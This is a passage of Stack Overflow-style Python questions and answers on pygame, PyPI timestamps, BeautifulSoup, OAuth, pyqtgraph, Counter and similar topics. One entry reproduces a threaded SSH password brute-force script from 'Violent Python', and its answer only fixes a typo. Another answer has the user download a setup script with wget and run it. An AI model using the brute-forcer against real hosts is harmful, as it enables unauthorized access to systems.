newchain = chain[:index]+[(y-pivoty+pivotx, (x-pivotx)+pivoty) for (x,y) in chain[index:]]
else:
newchain = chain[:index]+[(y-pivoty+pivotx, -(x-pivotx)+pivoty) for (x,y) in chain[index:]]
return newchain
pygame.init()
size = [600, 600]
screen = pygame.display.set_mode(size)
white = (255,255,255)
black = (0,0,0)
n = 20
chain = [(i,0) for i in xrange(n)]
screen.fill(white)
for square in chain:
draw(square)
pygame.display.flip()
raw_input("Press Enter to continue...")
newchain = rotate(chain, 5, 1)
print chain
print newchain
screen.fill(white)
for square in newchain:
draw(square)
pygame.display.flip()
raw_input("Press Enter to continue...")
screen.fill(white)
newchain = rotate(newchain, 10,0)
for square in newchain:
draw(square)
pygame.display.flip()
raw_input("Press Enter to continue...")
pygame.quit()
The function rotate takes an index of a square in the chain and rotates the
whole chain after that square by 90 degrees, pivoting around the initial
square. The problem is that this is meant to mimic a physical toy so it is not
allowed to collide with itself. I can check to see if two squares are on top
of each other after a rotation but how can I make sure they wouldn't collide
temporarily during a rotation?
Answer: It sounds like you already know how to know if they're overlapping once you do
the rotation, unless I am misunderstanding. If that's the case, then it would
be relatively easy to define a function to answer that question given a
potential rotation in the chain by adding a check to the end of your
comprehension:
if (direction == 1):
newchain = chain[:index]+[(y-pivoty+pivotx, (x-pivotx)+pivoty) for (x,y) in chain[index:] if not overlapping(x, y, pivotx, pivoty)]
else:
newchain = chain[:index]+[(y-pivoty+pivotx, -(x-pivotx)+pivoty) for (x,y) in chain[index:] if not overlapping(x, y, pivotx, pivoty)]
And of course relying on some kind of:
    def overlapping(x, y, px, py):
        if (some logic that determines if this is bad):
            raise Exception('Overlapping')
        return True
You would need to do something useful with the exception, but at least this
would check each square as you process it, and break out immediately instead
of waiting until after the whole rotation to verify that it's good.
|
how to parse time stamps in Python from PyPI packages (eg. 12-Oct-2010 06:40)
Question: I'm wondering if there is a straightforward way to do this. Since PyPI is the
Python packaging authority, it seems like parsing these time stamps (into
epoch time, perhaps) should be handled in Python somewhat easily, but how to
do this eludes me.
As an example, here are the time stamps of when different versions of IPython
were uploaded:
<https://pypi.python.org/packages/source/i/ipython/>
Could someone please explain to me how to parse these time stamps with Python
into the epoch in a sensible way.
Answer: Instead of trying to parse the directory listing output, use the PyPI API.
There are:
* a [JSON API](https://wiki.python.org/moin/PyPIJSON?action=show&redirect=PyPiJson)
* a [XML-RPC interface](https://wiki.python.org/moin/PyPIXmlRpc?action=show&redirect=PyPiXmlRpc)
* and a [HTTP API](http://www.python.org/dev/peps/pep-0301/)
which give you _parsed_ access to that information. For example, the [JSON
link for ipython release
0.10.1](https://pypi.python.org/pypi/ipython/0.10.1/json) gives you ISO8601
dates:
"urls": [
{
"has_sig": false,
"upload_time": "2010-10-12T08:40:01",
"comment_text": "",
"python_version": "source",
"url": "https://pypi.python.org/packages/source/i/ipython/ipython-0.10.1.tar.gz",
"md5_digest": "54ae47079b0e9a0998593a99ce76ec1f",
"downloads": 20100,
"filename": "ipython-0.10.1.tar.gz",
"packagetype": "sdist",
"size": 5837840
},
{
"has_sig": false,
"upload_time": "2010-10-12T08:40:38",
"comment_text": "",
"python_version": "source",
"url": "https://pypi.python.org/packages/source/i/ipython/ipython-0.10.1.zip",
"md5_digest": "f636c7ea03ff626a6ef9bd9a901de691",
"downloads": 29725,
"filename": "ipython-0.10.1.zip",
"packagetype": "sdist",
"size": 6419900
}
]
which can be parsed into [`datetime.datetime`
objects](http://docs.python.org/2/library/datetime.html):
>>> import datetime
>>> datestr = "2010-10-12T08:40:01"
>>> datetime.datetime.strptime(datestr, '%Y-%m-%dT%H:%M:%S')
datetime.datetime(2010, 10, 12, 8, 40, 1)
That said, the date format in your sample listing can be parsed with:
>>> datestr = "12-Oct-2010 06:40"
    >>> datetime.datetime.strptime(datestr, '%d-%b-%Y %H:%M')
    datetime.datetime(2010, 10, 12, 6, 40)
but the behavior of the `%b` placeholder is dependent on your locale; it'll
only work correctly here when that is set to C or an English locale.
The best way to parse _arbitrary_ dates then, is to use the [`python-dateutil`
package](http://labix.org/python-dateutil) (an add-on install), as its parser
is very robust:
>>> from dateutil.parser import parse
>>> parse(datestr)
datetime.datetime(2010, 10, 12, 6, 40)
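If you then need epoch time, as the question suggests, one way (assuming the upload
timestamps are UTC) is:

    >>> import calendar
    >>> dt = datetime.datetime(2010, 10, 12, 8, 40, 1)
    >>> calendar.timegm(dt.utctimetuple())
    1286872801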
|
File is not creating in python when unicode present in the file name
Question: I need to store HTML files as text files, named after the web page title.
Something went wrong with my code, so it is not creating the file inside the
directory. I have write permission on the directory. I am using Ubuntu 12.04 LTS.
Directory: `/home/user1/`. File name: print name = Mathrubhumi Sports -
ശ്രീനിക്ക് പച്ചക്കൊടി
The file name contains Unicode characters.
import os
from urllib import urlopen
from bs4 import BeautifulSoup
url= "http://www.mathrubhumi.com/sports/story.php?id=397111"
raw = urlopen(url).read()
soup = BeautifulSoup(raw,'lxml')
texts = soup.findAll(text=True)
name = soup.title.text
name= name+'.txt'
def contains_unicode(text):
try:
str(text)
except:
return True
return False
result = ''.join((text for text in texts if contains_unicode(text)))
# Output to a file
with open(os.path.join('/home/user1/textfiles',name,'w') as out:
out.write(result)
Please help me to debug it
Answer: I tried this and it worked, it created a file called Mathrub*.txt with some
text in it in the current directory.
import codecs
import os
from urllib import urlopen
from bs4 import BeautifulSoup
url= "http://www.mathrubhumi.com/sports/story.php?id=397111"
raw = urlopen(url).read()
soup = BeautifulSoup(raw,'lxml')
texts = soup.findAll(text=True)
name = soup.title.string
name= name+'.txt'
def contains_unicode(text):
try:
str(text)
except:
return True
return False
result = ''.join((text for text in texts if contains_unicode(text)))
# Output to a file
with codecs.open(name,'w',encoding="utf-8") as out:
out.write(result)
Before adding the codecs part, it complained loudly about trying to write some
characters that it did not know how to interpret.
|
Easy_install and pip broke: pkg_resources.DistributionNotFound: distribute==0.6.36
Question: I tried to upgrade pip with `pip install --upgrade pip` on OS X, and now pip and
easy_install both don't work.
When running pip
Traceback (most recent call last):
File "/usr/local/bin/pip", line 5, in <module>
from pkg_resources import load_entry_point
File "/usr/local/Cellar/python/2.7.4/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/distribute-0.6.49-py2.7.egg/pkg_resources.py", line 2881, in <module>
parse_requirements(__requires__), Environment()
File "/usr/local/Cellar/python/2.7.4/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/distribute-0.6.49-py2.7.egg/pkg_resources.py", line 596, in resolve
raise DistributionNotFound(req)
pkg_resources.DistributionNotFound: pip==1.3.1
When running easy_install
File "/usr/local/bin/easy_install", line 5, in <module>
from pkg_resources import load_entry_point
File "/usr/local/Cellar/python/2.7.4/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/distribute-0.6.49-py2.7.egg/pkg_resources.py", line 2881, in <module>
parse_requirements(__requires__), Environment()
File "/usr/local/Cellar/python/2.7.4/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/distribute-0.6.49-py2.7.egg/pkg_resources.py", line 596, in resolve
raise DistributionNotFound(req)
pkg_resources.DistributionNotFound: distribute==0.6.36
How can I fix this?
**UPDATE** I found the solution.
I did `cd /usr/local/lib/python2.7/site-packages && ls`
found `pip-1.4.1-py2.7.egg-info` and `distribute-0.6.49-py2.7.egg` in the
directory.
Then the following steps fixed the issue.
1. Changed the pip version to 1.4.1 in `/usr/local/bin/pip`
2. Changed distribute version to 0.6.49 in `/usr/local/bin/easy_install`
* * *
The answers on other such questions, to curl ez_setup.py and install setuptools
from it, didn't work. It gave the following error.
Downloading https://pypi.python.org/packages/source/s/setuptools/setuptools-1.1.6.tar.gz
Traceback (most recent call last):
File "<stdin>", line 370, in <module>
File "<stdin>", line 366, in main
File "<stdin>", line 278, in download_setuptools
File "<stdin>", line 185, in download_file_curl
File "/usr/local/Cellar/python/2.7.4/Frameworks/Python.framework/Versions/2.7/lib/python2.7/subprocess.py", line 542, in check_call
raise CalledProcessError(retcode, cmd)
subprocess.CalledProcessError: Command '['curl', 'https://pypi.python.org/packages/source/s/setuptools/setuptools-1.1.6.tar.gz', '--silent', '--output', '/usr/bin/setuptools-1.1.6.tar.gz']' returned non-zero exit status 23
Answer: Install the distribute package as follows:
$ wget https://svn.apache.org/repos/asf/oodt/tools/oodtsite.publisher/trunk/distribute_setup.py
$ python distribute_setup.py
You will have a working `easy_install` then.
Happy Coding.
|
get all link site in source html (python)
Question: I want to get all the links in a web page. This function returns only one link,
but I need to get all of them. Of course I know I need a loop, but I don't know how
to use it here. I need to get all the links.
def get_next_target(page):
start_link = page.find('<a href=')
start_quote = page.find('"', start_link)
end_quote = page.find('"', start_quote + 1)
url = page[start_quote + 1:end_quote]
return url, end_quote
Answer: This is where a HTML parser comes in handy. I recommend
[`BeautifulSoup`](http://www.crummy.com/software/BeautifulSoup/):
from bs4 import BeautifulSoup as BS
    def get_next_target(page):
soup = BS(page)
return soup.find_all('a', href=True)
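That returns the `<a>` tags themselves; if you only want the URL strings, as in your
original function, a small variation would be:

    from bs4 import BeautifulSoup as BS

    def get_all_links(page):
        soup = BS(page)
        return [a['href'] for a in soup.find_all('a', href=True)]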
|
Chinese Restaurant Process implementation in Python
Question: I have wrote a code in Python for CRP problem. The problem itself can be found
here: <http://cog.brown.edu/~mj/classes/cg168/slides/ChineseRestaurants.pdf>
And to give a short description of it: Suppose we want to assign people
entering to a restaurants to potentially infinite number of tables. If $z_i$
represents the random variable assigned for the $i$'th person entering the
restaurant the following should hold:
With probability $p(z_i=a|z_1,...,z_{i-1})=\frac{n_a}{i-1+\alpha}$ for $n_a>0$,
the $i$'th person will sit in table $a$, and with probability
$p(z_i=a|z_1,...,z_{i-1})=\frac{\alpha}{i-1+\alpha}$ the $i$'th person will sit
around a new table.
I am not quite sure if my code is correct because I am surprised how small the
final number of tables is.
I would be happy if somebody could say whether the implementation is correct and, if
so, whether there are any possible improvements.
import numpy as np
def CRP(alpha,N):
"""Chinese Restaurant Process with alpha as concentration parameter and N
the number of sample"""
#Array which will save for each i, the number of people people sitting
#until table i
summed=np.ones(1) #first person assigned to the first table
for i in range(1,N):
#A loop that assigns the people to tables
#randind represent the random number from the interval [1,i-1+alpha]
randind=(float(i)+alpha)*np.random.uniform(low=0.0, high=1.0, size=1)
#update is the index for the table that the person should be placed which
#if greater than the total number, will be placed in a new table
update=np.searchsorted(summed,randind,side='left')
if randind>i:
summed=np.append(summed,i+1)
else:
zerovec=np.zeros(update)
onevec=np.ones(summed.size-update)
summed+=np.append(zerovec,onevec)
#This part converts summed array to tables array which indicates the number
#of persons assigned to that table
tables=np.zeros(summed.size)
tables[0]=summed[0]
for i in range(1,summed.size):
tables[i]=summed[i]-summed[i-1]
return tables
a=CRP(0.9999,1000)
print a
Answer: Suggestion. Forget about the code you have written. Construct declarative
tests of the code. By taking that approach, you start with examples for which
you know the correct answer. That would have answered Brainiac's question, for
example.
Then write your program. You will likely find that if you start approaching
problems this way, you may create sub-problems first, for which you can also
write tests. Until they all pass, there is no need to rush on to the full
problem.
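For what it's worth, the small final number of tables is not by itself a sign of a bug: the
expected number of occupied tables after N customers is the sum over i of alpha/(alpha+i-1),
roughly alpha*ln(N), which is only about 7.5 for alpha close to 1 and N = 1000. A slow but
obviously-correct reference implementation to test your vectorised code against might look
like this (a sketch using numpy.random.choice):

    import numpy as np

    def crp_reference(alpha, N):
        tables = []                              # tables[k] = people at table k
        for i in range(1, N + 1):                # the i-th customer arrives
            probs = np.array(tables + [alpha], dtype=float) / (i - 1 + alpha)
            k = np.random.choice(len(probs), p=probs)
            if k == len(tables):
                tables.append(1)                 # opens a new table
            else:
                tables[k] += 1
        return np.array(tables)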
|
Sample of Server to Server authentication using OAuth 2.0 with Google API's
Question: This is a follow-up question for [this
question](http://stackoverflow.com/questions/19391252/how-to-obtain-a-private-
key-for-a-legacy-google-app-engine-project):
I have successfully created a private key and have read the various pages of
Google documentation on the concepts of server to server authentication.
I need to create a JWT to authorize my App Engine application (Python) to
access the Google calendar and post events in the calendar. From the source in
`oauth2client` it looks like I need to use
`oauth2client.client.SignedJwtAssertionCredentials` to create the JWT.
What I'm missing at the moment is a stylised bit of sample Python code of the
various steps involved to create the JWT and use it to authenticate my App
Engine application for Google Calendar. Also, from
`SignedJwtAssertionCredentials` source it looks like I need some App Engine
compatible library to perform the signing.
Can anybody shed some light on this?
Answer: After some digging I found a [couple of
samples](https://code.google.com/p/google-api-python-
client/source/browse/#hg/samples/service_account) based on the OAuth2
authentication. From this I cooked up the following simple sample that creates
a JWT to access the calendar API:
import httplib2
import pprint
from apiclient.discovery import build
from oauth2client.client import SignedJwtAssertionCredentials
# Get the private key from the Google supplied private key file.
f = file("your_private_key_file.p12", "rb")
key = f.read()
f.close()
# Create the JWT
credentials = SignedJwtAssertionCredentials(
"[email protected]", key,
scope="https://www.googleapis.com/auth/calendar"
)
# Create an authorized http instance
http = httplib2.Http()
http = credentials.authorize(http)
# Create a service call to the calendar API
service = build("calendar", "v3", http=http)
# List all calendars.
lists = service.calendarList().list(pageToken=None).execute(http=http)
pprint.pprint(lists)
For this to work on Google App Engine you will need to enable PyCrypto for
your app. This means adding the following to your `app.yaml` file:
libraries:
- name: pycrypto
version: "latest"
|
Send by ref/by ptr in python?
Question: I need some help. I am trying to pass a value to a method by reference or by pointer,
like in C++. How can I do it?
For example:
def test(x):
x=3
x=2
test(x)
print(x)
In this case x is a local variable in the test method and will not change the
"original" x, so how can I change the "original" x? Thanks.
Answer: In some ways, all calls in Python are called with references. In fact, all
variables are references in a sense. But some types, like `int` from your
example, cannot be changed.
In the case of, say, a `list`, the functionality you're looking for is
trivial:
def change_it(some_list):
some_list.append("world")
foo = ["hello"]
change_it(foo)
print(foo) # prints ['hello', 'world']
Note, however, that reassigning the _parameter_ variable `some_list` does not
change the value in the calling context.
If you're asking this question, though, you're probably looking to do
something like set two or three variables using one function. In that case,
you're looking for something like this:
def foo_bar(x, y, z):
return 2*x, 3*y, 4*z
x = 3
y = 4
z = 5
x, y, z = foo_bar(x, y, z)
print(y) # prints 12
Of course, you can do anything in Python, but that doesn't mean you should. In
the fashion of the TV show Mythbusters, here's something that does what you're
looking for
import inspect
def foo(bar):
frame = inspect.currentframe()
outer = inspect.getouterframes(frame)[1][0]
outer.f_locals[bar] = 2 * outer.f_locals[bar]
a = 15
foo("a")
print(a) # prints 30
or even worse:
import inspect
import re
def foo(bar):
# get the current call stack
my_stack = inspect.stack()
# get the outer frame object off of the stack
outer = my_stack[1][0]
# get the calling line of code; see the inspect module documentation
# only works if the call is not split across multiple lines of code
calling_line = my_stack[1][4][0]
# get this function's name
my_name = my_stack[0][3]
# do a regular expression search for the function call in traditional form
# and extract the name of the first parameter
m = re.search(my_name + "\s*\(\s*(\w+)\s*\)", calling_line)
if m:
# finally, set the variable in the outer context
outer.f_locals[m.group(1)] = 2 * outer.f_locals[m.group(1)]
else:
raise TypeError("Non-traditional function call. Why don't you just"
" give up on pass-by-reference already?")
# now this works like you would expect
a = 15
foo(a)
print(a)
# but then this doesn't work:
baz = foo_bar
baz(a) # raises TypeError
# and this *really*, disastrously doesn't work
a, b = 15, 20
foo_bar, baz = str, foo_bar
baz(b) and foo_bar(a)
print(a, b) # prints 30, 20
Please, _please_ , _**please**_ , don't do this. I only put it in here to
inspire the reader to look into some of the more obscure parts of Python.
|
function calls in python (pygame)
Question: I'm trying to split my code into functions and I want to input my own values
for x and y, so the character can move from the inputted values. When I try to
do this from the function call, nothing happens.
Any suggestions?
import pygame, sys
from pygame.locals import *
pygame.init()
width,height=(842,595)
screen = pygame.display.set_mode((width,height),0,32)
pygame.display.set_caption("game")
man = pygame.image.load("man.png")
target = pygame.image.load("star.png")
#setting a background image
bgimage= pygame.image.load("background.jpg")
##image for the jupiter object
another_target = pygame.image.load("jupiter.gif")
x = 100
y = height-300
another_targetx = 400
another_targety = 500
#allows movement whilst holding down key.
clock= pygame.time.Clock()
def move(x,y):
movingX =0
movingY =0
speedX =0
speedY=0
while True:
pygame.display.update()
for event in pygame.event.get():
if event.type==QUIT:
pygame.quit()
sys.exit()
elif event.type==KEYDOWN:
if event.key ==K_LEFT:
x-=5
elif event.key==K_RIGHT:
x+=5
elif event.key==K_UP:
y-=5
elif event.key==K_DOWN:
y+=5
time_Passed=clock.tick(25)
time_elapsed_seconds=time_Passed/1000.0
distanceX = time_elapsed_seconds*speedX
movingX+=distanceX
distanceY=time_elapsed_seconds*speedY
movingY+=distanceY
x+=movingX
y+=movingY
clock.tick(50)
pygame.display.update()
move(x,y)
screen.blit(bgimage,(0,0))
screen.blit(man, (x,y))
screen.blit( another_target,( another_targetx, another_targety))
screen.blit(target,(200,400))
pygame.display.update()
Answer: You have an infinite loop inside the function `move(x, y)`. The code
outside of this loop which updates the screen is never reached, so nothing
ever appears to happen. Try putting everything after the function definition
into the `while True` loop inside the function, as sketched below.
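A rough sketch of that change, based on the question's code (the unused speed variables are
dropped):

    def move(x, y):
        while True:
            for event in pygame.event.get():
                if event.type == QUIT:
                    pygame.quit()
                    sys.exit()
                elif event.type == KEYDOWN:
                    if event.key == K_LEFT:
                        x -= 5
                    elif event.key == K_RIGHT:
                        x += 5
                    elif event.key == K_UP:
                        y -= 5
                    elif event.key == K_DOWN:
                        y += 5
            # draw inside the loop so the updated x and y are actually shown
            screen.blit(bgimage, (0, 0))
            screen.blit(man, (x, y))
            screen.blit(another_target, (another_targetx, another_targety))
            screen.blit(target, (200, 400))
            pygame.display.update()
            clock.tick(50)

    move(x, y)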
|
Python 3.3 pyqtgraph can't plot points
Question: Is it me, or is it impossible to plot points (scatterplot) in pyqtgraph using
Python 3.3?
I have quite big data*, and find matplotlib way too slow, so I would like to
give this a try:
1) `pyqtgraph.plot([1],[1])` shows nothing in the plot.
2) `pyqtgraph.plot([1,2,3,4], [1,2,3,4])` shows a line connecting the dots
3) `pyqtgraph.plot([1,2,3,4], [1,2,3,4], pen=None)` as suggested by docs,
errors**
4) `pyqtgraph.ScatterPlotItem()` does not exist.
I do not know what to try anymore... Did anyone get this working and would be
willing to share code?
* * *
* I am aware of the irony with the data I present, forgive me.
** TypeError: unsupported operand type(s) for -: 'NoneType' and 'NoneType'.
*** Perhaps unrelated, but I also can't get the examples to run (Ubuntu
13.04).
Answer: The correct ways to create a scatter plot are either by specifying the symbol
properties when plotting (symbol, symbolPen, symbolBrush, symbolSize; see the
[PlotDataItem
API](http://pyqtgraph.org/documentation/graphicsItems/plotdataitem.html#pyqtgraph.PlotDataItem.__init__)):
pg.plot([1,2,3,4], [1,2,3,4], pen=None, symbol='o')
Or by directly creating a ScatterPlotItem, which seems to exist on my end:
>>> import pyqtgraph as pg
>>> pg.ScatterPlotItem
<class 'pyqtgraph.graphicsItems.ScatterPlotItem.ScatterPlotItem'>
See `examples/ScatterPlot.py` on how to use the latter method.
|
Generating Pivot Tables in Python - Pandas? Numpy? Xlrd? from csv
Question: I have been searching for hours, literally the entire day on how to generate a
pivot table in Python. I am very new to python so please bear with me.
What I want is to take a csv file, extract the first column and generate a
pivot table using the count or frequency of the numbers in that column, and
sort descending
import pandas
import numpy
from numpy import recfromtxt
a = recfromtxt('1.csv', skiprows=1, usecols=0, delimiter=',')
print a
^ What I get here is a list of the first column: [2 2 2 6 7]
What I need is an export of 2 columns:
2--3
6--1
7--1
Answer: Have you had a look here?
<https://pypi.python.org/pypi/pivottable>
Otherwise, from you example, you might just use list comprehensions:
>>> l = [2,2,2,6,7]
>>> [(i, l.count(i)) for i in set(l)]
[
(2,3),
(6,1),
(7,1)
]
Or even dictionary comprehensions, depending on what you need:
>>> l = [2,2,2,6,7]
>>> {i:l.count(i) for i in set(l)}
{
2: 3,
6: 1,
7: 1
}
**edit** (suggestions from @Peter DeGlopper)
Another more efficient way using
[collections.Counter](http://docs.python.org/2/library/collections.html#counter-
objects) (read comments below):
>>> from collections import Counter
>>> l = [2,2,2,6,7]
>>> Counter(l)
Counter({2: 3, 6: 1, 7: 1})
|
How to install external packages into Canopy?
Question: I am new to python and Canopy. I have searched for the possible solutions
online, including the support forum of Enthought Canopy, but failed to solve
my problem by following the instructions under other similar questions.
I use Mac OS, and wanted to install external python packages to my Enthought
Canopy (specifically, a new package named "ggplot"
(<https://github.com/yhat/ggplot/>)).
The instructions on the support forum of Enthought
(<https://support.enthought.com/entries/23389761-Installing-packages-into-
Canopy-Python-from-the-command-line>) said " follow standard Python
installation procedures from the OS command line ". However, I could only
install this package to my previous python library (system default python).
When I try to import this module in Canopy, it fails. I thought I might need
to change the installation path in order to install this package in Canopy,
but I am not sure how or where to change it.
When I use Sublime Text to run my scripts with Enthought set as the default
Python env, it succeeds, so I guess it is still importing the package from my
previous Python library. How can I know which environment the editor is
currently using?
Thanks!
Answer: 1) The cited article links to [another
article](https://support.enthought.com/entries/23646538-Make-Canopy-s-Python-
be-your-default-Python-i-e-on-the-PATH-), which describes how to make Canopy
Python be the default python, and states that the easiest way is simply to use
the Canopy Preferences dialog to make Canopy be your default Python.
If you prefer not to do that, the article suggests that you modify the PATH
environment variable (note that this is not actually an "installation path"
but a more general path used for locating programs to run for any reason.)
So I'm guessing that you don't know how to do this? Here's a simple way. From
a terminal, type the following (substituting your own user name) before
continuing with the installation:
` export PATH=/Users/your-user-
name/Library/Enthought/Canopy_64bit/User/bin:${PATH} `
2) To find out what environment your editor is using, run the following
program:
import sys
print sys.prefix
|
Print output to file on python
Question: I have two Python files. My test.py imports the td.py file, which I found on
the internet. The td.py file listens for signals from the TelldusCenter program.
Now if I run the test.py file it shows me the signals I get from the TelldusCenter
app, and the output is something like "Door - ON". Now I would like to print that
"Door - ON" text to a file, but I don't know how.
Here is my test.py file
#!/usr/bin/env python
import td
import time
def myDeviceEvent(deviceId, method, data, callbackId):
print '%s' %( td.getName(deviceId) )+' - %s' %(td.methodsReadable.get(method, 'Unknown' ))
td.registerDeviceEvent(myDeviceEvent)
try:
while(1):
time.sleep(1)
except KeyboardInterrupt:
print 'KeyboardInterrupt received, exiting'
"td.registerDeviceEvent(myDeviceEvent)" print output to terminal now. I try to
print that to file but it just give me error.
a = open("output.txt", "w")
a.write(td.registerDeviceEvent(myDeviceEvent))
> Traceback (most recent call last): File "testi.py", line 11, in
> a.write(td.registerDeviceEvent(myDeviceEvent)) TypeError: expected a
> character buffer object
Answer: From my interpretation of the code, `td.registerDeviceEvent(myDeviceEvent)`
registers a callback. It does not produce a string itself. This is why you
cannot output the 'result' of the registration.
Instead try this:
#!/usr/bin/env python
import td
import time
a = open("output.txt", "w")
    def myDeviceEvent(deviceId, method, data, callbackId):
        a.write('%s - %s\n' % (td.getName(deviceId), td.methodsReadable.get(method, 'Unknown')))
        a.flush()  # flush so the line reaches the file right away
    td.registerDeviceEvent(myDeviceEvent)
    try:
        while(1):
            time.sleep(1)
    except KeyboardInterrupt:
        a.close()
|
Python: fast iteration through file
Question: I need to iterate through two files many million times, counting the number of
appearances of word pairs throughout the files. (in order to build contingency
table of two words to calculate Fisher's Exact Test score)
I'm currently using
from itertools import izip
src=tuple(open('src.txt','r'))
tgt=tuple(open('tgt.txt','r'))
w1count=0
w2count=0
w1='someword'
w2='anotherword'
for x,y in izip(src,tgt):
if w1 in x:
w1count+=1
if w2 in y:
w2count+=1
.....
While this is not bad, I want to know if there is any faster way to iterate
through two files, hopefully significantly faster.
I appreciate your help in advance.
Answer: I still don't quite get what exactly you are trying to do, but here's some
example code that might point you in the right direction.
We can use a dictionary or a `collections.Counter` instance to count all
occurring words and pairs _in a single pass_ through the files. After that, we
only need to query the in-memory data.
import collections
import itertools
import re
def find_words(line):
for match in re.finditer("\w+", line):
yield match.group().lower()
counts1 = collections.Counter()
counts2 = collections.Counter()
counts_pairs = collections.Counter()
with open("src.txt") as f1, open("tgt.txt") as f2:
for line1, line2 in itertools.izip(f1, f2):
words1 = list(find_words(line1))
words2 = list(find_words(line2))
counts1.update(words1)
counts2.update(words2)
counts_pairs.update(itertools.product(words1, words2))
print counts1["someword"]
print counts1["anotherword"]
print counts_pairs["someword", "anotherword"]
|
AttributeError: '_BoundedSemaphore' object has no attribute 'acuire'
Question: I am learning Python through a book called Violent Python, and I am
on a section which involves making a brute-force SSH script. I am having
problems with an error, and cannot figure out the problem or the fix.
the code:
import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s= pxssh.pxssh()
s.login(host, user, password)
print '[+] Password Found: ' + password
Found = True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser('usage%prog ' + \
'-H <target host> -u <user> -F <password list>')
parser.add_option('-H', dest='tgtHost', type='string', \
help='target host')
parser.add_option('-F', dest='passwdFile', type='string', \
help='specify password file')
parser.add_option('-u', dest='user', type='string', \
help='the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passwdFile = options.passwdFile
user = options.user
if host == None or passwdFile == None or user == None:
print parser.usage
exit(0)
fn = open(passwdFile, 'r')
for line in fn.readlines():
if Found:
print "[*] Exiting: Password Found"
exit(0)
if Fails > 5:
print "[!] Exiting: Too Many Socket Timeouts"
exit(0)
connection_lock.acuire()
password = line.strip('\r').strip('\n')
print "[-] Testing: "+str(password)
t = Tread(target=connect, args=(host, user, password, true))
child = t.start()
if __name__ == '__main__':
main()
this is the error I get:
[root@test ~]# python2.7 test5.py -H x.x.x.x -u root -F pass.txt
Traceback (most recent call last):
File "test5.py", line 70, in <module>
main()
File "test5.py", line 64, in main
connection_lock.acuire()
AttributeError: '_BoundedSemaphore' object has no attribute 'acuire'
I have edited out the actual host x.x.x.x, but the host I am using is up and
live. Any help understanding this error and a fix would be helpful.
Answer: You simply have a typo; the line should be
connection_lock.acquire()
# ^
|
Is there a python http-client which automatically performs authentication for several auth types?
Question: I am currently using urllib2 or curl to perform authentication to different
Trac, Jira, Twiki and Media Wiki sites to request information like the users
that are active.
Now depending on the settings on the specific instance I currently need to
specify how to perform the authentication (e.g. trac uses either Basic or
Digest auth scheme).
Is there a (Python) library or a piece of code that automatically identifies
the server's auth scheme and performs the authentication given url, username,
and password, to eliminate this server-specific setting as a constant source of error?
Answer: Python Requests doesn't handle the authentication scheme automatically, but it
provides a simpler interface to handle both Basic and Digest.
Check <http://www.python-requests.org/en/latest/user/authentication/> for code
examples.
The code below tries to get the url once to discover the authentication scheme, then
retries the url with the correct Auth implementation:
import requests
import sys
from requests.auth import HTTPBasicAuth, HTTPDigestAuth
AUTH_MAP = {
'basic': HTTPBasicAuth,
'digest': HTTPDigestAuth,
}
def auth_get(url, *args, **kwargs):
r = requests.get(url)
if r.status_code != 401:
return r
auth_scheme = r.headers['WWW-Authenticate'].split(' ')[0]
auth = AUTH_MAP.get(auth_scheme.lower())
if not auth:
raise ValueError('Unknown authentication scheme')
r = requests.get(url, auth=auth(*args, **kwargs))
return r
if __name__ == '__main__':
print auth_get(*sys.argv[1:])
Test it with `python test_request.py username password`.
|
BeautifulSoup - why is it printing file path and not the content
Question: I am trying to understand how BeautifulSoup works. Note that I am really new
to Python, so I am probably missing something.
I open a Python terminal and write this:
from bs4 import BeautifulSoup
import re
ytchannel = '/home/XXX/Documents/test2'
soup = BeautifulSoup(ytchannel)
print(soup.prettify())
This is what I get:
<html>
<body>
<p>
/home/XXX/Documents/test2
</p>
</body>
</html>
Why? It makes no sense to me. I just want the content of `test2`. I am writing
exactly what is written on the BeautifulSoup website.
Answer: You passed a string to `BeautifulSoup()`; sure it is a filename, but
`BeautifulSoup()` does not open filenames for you. It operates on strings or
open file-objects only.
Open the file first; `BeautifulSoup()` will read file objects if you pass
those in:
with open(ytchannel) as infile:
soup = BeautifulSoup(infile)
See [Making the
soup](http://www.crummy.com/software/BeautifulSoup/bs4/doc/#making-the-soup).
|
Python data structure for sorted key-value pairs
Question: I have a (fixed) set of keys for which I store a value. I often look up the
value for a key and increment or decrement it. A typical dict usage.
x = {'a': 1, 'b': 4, 'c': 3}
x['a'] += 1
Additionally however, just as often as incrementing or decrementing values, I
also need to know the key for the i-th largest (or smallest) value. Of course
I can do the sorting:
s = sorted(x, key=lambda k:(x[k],k))
s[1] == 'c'
The problem is that sorting every time seems rather expensive, especially because I
only increment one item in between sorts. I feel that I could use another data
structure better suited for this. A tree, perhaps?
Answer: You could use blist's sorteddict to keep the values in order. Here's a quick
implementation of a dictionary which, when iterated over, returns its keys in
order of its values (not really tested intensively):
import collections
from blist import sorteddict
class ValueSortedDict(collections.MutableMapping):
def __init__(self, data):
self._dict = {}
self._sorted = sorteddict()
self.update(data)
def __getitem__(self, key):
return self._dict[key]
def __setitem__(self, key, value):
# remove old value from sorted dictionary
if key in self._dict:
self.__delitem__(key)
# update structure with new value
self._dict[key] = value
try:
keys = self._sorted[value]
except KeyError:
self._sorted[value] = set([key])
else:
keys.add(key)
def __delitem__(self, key):
value = self._dict.pop(key)
keys = self._sorted[value]
keys.remove(key)
if not keys:
del self._sorted[value]
def __iter__(self):
for value, keys in self._sorted.items():
for key in keys:
yield key
def __len__(self):
return len(self._dict)
x = ValueSortedDict(dict(a=1, b=4, c=3))
x['a'] += 1
print list(x.items())
x['a'] += 10
print list(x.items())
x['d'] = 4
print list(x.items())
This gives:
[('a', 2), ('c', 3), ('b', 4)]
[('c', 3), ('b', 4), ('a', 12)]
[('c', 3), ('b', 4), ('d', 4), ('a', 12)]
|
Running tests for third-party Django app results in "ImportError: No module named urls"
Question: I've installed a not-yet-open sourced third-party Django app using pip and now
I'm implementing unit tests for it. However, whenever I try running the unit
tests, it results in the following traceback for each test case:
